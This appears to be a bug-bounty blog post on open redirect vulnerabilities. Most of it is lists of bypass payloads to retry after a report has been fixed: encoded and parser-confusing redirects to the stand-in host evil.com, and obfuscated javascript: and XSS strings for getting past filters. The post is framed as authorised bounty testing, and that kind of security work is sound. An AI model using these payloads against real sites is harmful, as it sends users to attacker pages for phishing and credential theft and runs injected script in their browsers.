Hello folks, If your open redirect reports is resolved, then try these bypasses.
What is Open Redirect?
An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. For more info
How to find it?
Mostly it is found on login page of application URL like "http://example.com/login.php?redirect=http://example.com/page"
Hidden parameters accepting URL value. You can use hakrawler and x8 or this python script to run both tool
Basic Payloads:-
You can try these basic payloads to test for Open redirect vulnerability on any application
https://example.com/login?redirect=http://evil.com
https://example.com/login?redirect=javascript:alert(1);Here evil.com is our website and if example.com redirects you to this, then its vulnerable. If this is resolved then try this payloads:-
https://example.com/login?redirect=http://example.com@evil.com
https://example.com/login?redirect=http://example.com%09.evil.comIf these are resolved, then try these:-
https://example.com/login?redirect=http://example.com%3F.evil.com
https://example.com/login?redirect=http://example.com%2523.evil.com
https://example.com/login?redirect=http://evil.com?c=.example.com
https://example.com/login?redirect=http://example.com%252Eevil.comOther Open Redirect Payloads:-
https://example.com/login?next=//example.com@evil.com
https://example.com/login?next=/\/evil.com
https://example.com/login?next=//%2F/evil.com
https://example.com/login?next=/%0D/evil.com
https://example.com/login?next=/%5Cevil.com
https://example.com/login?next=//evil%E3%80%82com
https://example.com/login?next=%09http:///example.coc%40evil.comTry this Intigriti open redirect payload generator tool here
XSS Payloads for Open redirect:-
";alert(0);//
java%0d%0ascript%0d%0a:alert(0) j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0` java%07script:prompt`0` java%09scrip%07t:prompt`0` jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript pjavascriptt:confirm`0`I have tried these payloads on resolved report and found few targets vulnerable on HackerOne. You can also try
Good Luck!